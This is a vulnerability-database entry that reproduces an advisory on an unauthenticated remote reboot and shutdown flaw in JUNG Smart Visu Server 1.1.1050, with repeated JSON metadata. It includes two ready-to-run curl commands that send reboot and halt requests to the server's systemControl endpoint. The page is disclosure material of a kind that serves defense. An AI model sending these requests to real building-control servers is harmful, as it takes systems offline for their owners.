JUNG Smart Visu Server 1.1.1050 Remote Server Shutdown_ZSL-2026-5971

Description

Title: JUNG Smart Visu Server 1.1.1050 Remote Server Shutdown Advisory ID: ZSL-2026-5971 Type: Local/Remote Impact: Denial of Service Risk: 4/5 Release Date: 12.02.2026 Summary The Smart Visu Server makes your intelligent building control convenient...

Visit Original Source

Basic Information

ID ZSL-2026-5971

Published Feb 12, 2026 at 00:00

Affected Product

Affected Versions <html><body><p>JUNG Smart Visu Server 1.1.1050 Remote Server Shutdown

Vendor: ALBRECHT JUNG GMBH & CO. KG
Product web page: https://www.jung-group.com | https://www.jung.de
Affected version: 1.1.1050

Summary: The Smart Visu Server makes your intelligent building
control convenient. With the user-friendly operating concept,
you can control both the KNX system and other systems such as
Philips Hue or Sonos on your mobile devices. You can likewise
connect voice control to your KNX system with Amazon Alexa or
Google Assistant via the Smart Visu Server.

Desc: The device is suffering from a Denial of Service (DoS).
An unauthenticated attacker can reboot or shutdown the server
by sending one GET request.

Tested on: Jetty(9.2.12.v20150709)

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience

Advisory ID: ZSL-2026-5971
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2026-5971.php

07.02.2026

--

# Reboot server
$ curl -X POST "http://10.0.0.16:8080/rest/items/liteserver_LiteServer_1_systemControl" \
-H "User-Agent: thricer-engine/1.6" \
-d "{\"MSG_ID_TYPE\":\"MSG_REBOOT_REQ\"}"

# Shutdown server
$ curl -X POST "http://10.0.0.16:8080/rest/items/liteserver_LiteServer_1_systemControl" \
-H "User-Agent: thricer-engine/1.6" \
-d "{\"MSG_ID_TYPE\":\"MSG_HALT_REQ\"}"
</p></body></html>

{
    "lastseen": "2026-02-12T03:15:16",
    "description": "Title: JUNG Smart Visu Server 1.1.1050 Remote Server Shutdown Advisory ID: ZSL-2026-5971 Type: Local/Remote Impact: Denial of Service Risk: 4/5 Release Date: 12.02.2026 Summary The Smart Visu Server makes your intelligent building control convenient...",
    "published": "2026-02-12T00:00:00",
    "modified": "2026-02-12T00:00:00",
    "type": "zeroscience",
    "title": "JUNG Smart Visu Server 1.1.1050 Remote Server Shutdown",
    "source": "",
    "references": "",
    "id": "ZSL-2026-5971",
    "bulletinFamily": "exploit",
    "cwe": null,
    "cvelist": [],
    "sourceData": "<html><body><p>JUNG Smart Visu Server 1.1.1050 Remote Server Shutdown\r\n\r\n\r\nVendor: ALBRECHT JUNG GMBH & CO. KG\r\nProduct web page: https://www.jung-group.com | https://www.jung.de\r\nAffected version: 1.1.1050\r\n\r\nSummary: The Smart Visu Server makes your intelligent building\r\ncontrol convenient. With the user-friendly operating concept,\r\nyou can control both the KNX system and other systems such as\r\nPhilips Hue or Sonos on your mobile devices. You can likewise\r\nconnect voice control to your KNX system with Amazon Alexa or\r\nGoogle Assistant via the Smart Visu Server.\r\n\r\nDesc: The device is suffering from a Denial of Service (DoS).\r\nAn unauthenticated attacker can reboot or shutdown the server\r\nby sending one GET request.\r\n\r\nTested on: Jetty(9.2.12.v20150709)\r\n\r\n\r\nVulnerability discovered by Gjoko 'LiquidWorm' Krstic\r\n                            @zeroscience\r\n\r\n\r\nAdvisory ID: ZSL-2026-5971\r\nAdvisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2026-5971.php\r\n\r\n\r\n07.02.2026\r\n\r\n--\r\n\r\n\r\n# Reboot server\r\n$ curl -X POST \"http://10.0.0.16:8080/rest/items/liteserver_LiteServer_1_systemControl\" \\\r\n -H \"User-Agent: thricer-engine/1.6\" \\\r\n -d \"{\\\"MSG_ID_TYPE\\\":\\\"MSG_REBOOT_REQ\\\"}\"\r\n\r\n\r\n# Shutdown server\r\n$ curl -X POST \"http://10.0.0.16:8080/rest/items/liteserver_LiteServer_1_systemControl\" \\\r\n -H \"User-Agent: thricer-engine/1.6\" \\\r\n -d \"{\\\"MSG_ID_TYPE\\\":\\\"MSG_HALT_REQ\\\"}\"\r\n</p></body></html>",
    "sourceHref": "http://zeroscience.mk/codes/jung_dos.txt",
    "cvss": {
        "score": 0,
        "severity": "NONE",
        "vector": "NONE",
        "version": "NONE"
    },
    "cvss2": [],
    "cvss3": {
        "version": "",
        "vectorString": "",
        "baseScore": 0,
        "baseSeverity": "",
        "attackVector": "",
        "attackComplexity": "",
        "privilegesRequired": "",
        "userInteraction": "",
        "scope": "",
        "confidentialityImpact": "",
        "integrityImpact": "",
        "availabilityImpact": "",
        "cvssV3": {
            "version": "",
            "vectorString": "",
            "baseScore": 0,
            "baseSeverity": "",
            "attackVector": "",
            "attackComplexity": "",
            "privilegesRequired": "",
            "userInteraction": "",
            "scope": "",
            "confidentialityImpact": "",
            "integrityImpact": "",
            "availabilityImpact": ""
        }
    },
    "href": "http://zeroscience.mk/en/vulnerabilities/ZSL-2026-5971.php",
    "category_name": "Exploit",
    "post_link": "",
    "product": "",
    "version": "",
    "vendor": "",
    "ai_description": "",
    "ai_severity": "",
    "ai_vendor": "",
    "ai_product": "",
    "ai_version": "",
    "ai_score": 0
}

Description

Basic Information

Affected Product

💭 Join the Security Discussion ❌ Cancel Reply